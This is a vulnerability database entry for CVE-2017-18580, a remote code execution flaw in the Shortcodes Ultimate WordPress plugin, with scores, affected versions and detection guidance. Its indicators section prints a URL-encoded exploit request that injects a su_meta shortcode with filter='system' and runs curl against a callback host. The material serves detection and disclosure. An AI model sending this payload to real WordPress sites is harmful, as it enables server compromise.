cbcvebase.
CVE-2017-18580
published 2019-08-22

CVE-2017-18580: The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.

PriorityP182critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
12.09%
95.6th percentile
The shortcodes-ultimate plugin before 5.0.1 for WordPress has remote code execution via a filter in a meta, post, or user shortcode.

Affected

1 ranges
VendorProductVersion rangeFixed in
getshortcodesshortcodes_ultimate< 5.0.15.0.1

Detection & IOCsextracted from sources · hover to see the quote

url/wp-admin/post.php
commandaction=editpost&post_ID={{post_id}}&post_status=draft&post_type=post&_wpnonce={{nonce}}&post_title=nuclei-rce-test&content=%5Bsu_meta+key%3D1+post_id%3D1+default%3D%27curl+{{interactsh-url}}%27+filter%3D%27system%27%5D
url/?p={{post_id}}&preview=true
  • Exploit uses the [su_meta] shortcode with a 'filter' parameter set to 'system' to achieve RCE. Detect POST requests to /wp-admin/post.php containing 'filter%3D%27system%27' or 'filter='system'' in the body.
  • The exploit targets the shortcodes-ultimate plugin before 5.0.1 for WordPress via a filter parameter in su_meta, su_post, or su_user shortcodes. Monitor for shortcode usage containing 'filter=' paired with PHP function names (e.g., system, exec, passthru) in post content.
  • Successful exploitation results in an HTTP 302 redirect with 'post=' in the Location header, followed by a GET preview request. Correlate a POST to /wp-admin/post.php (302 response with 'post=' header) with a subsequent GET to /?p=<id>&preview=true and outbound DNS/HTTP callback.
  • The exploit URL-encodes the malicious shortcode payload. Look for URL-encoded bracket sequences '%5B' and '%5D' wrapping 'su_meta', 'su_post', or 'su_user' in POST body to /wp-admin/post.php.
  • ·The CVE affects shortcodes-ultimate plugin versions strictly before 5.0.1. Ensure the installed plugin version is checked; version 5.0.1 and later are patched.
  • ·The PoC uses an out-of-band (OOB) DNS/HTTP callback via interactsh to confirm RCE. Detection relying solely on response codes may produce false positives; OOB confirmation is required for high-confidence detection.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.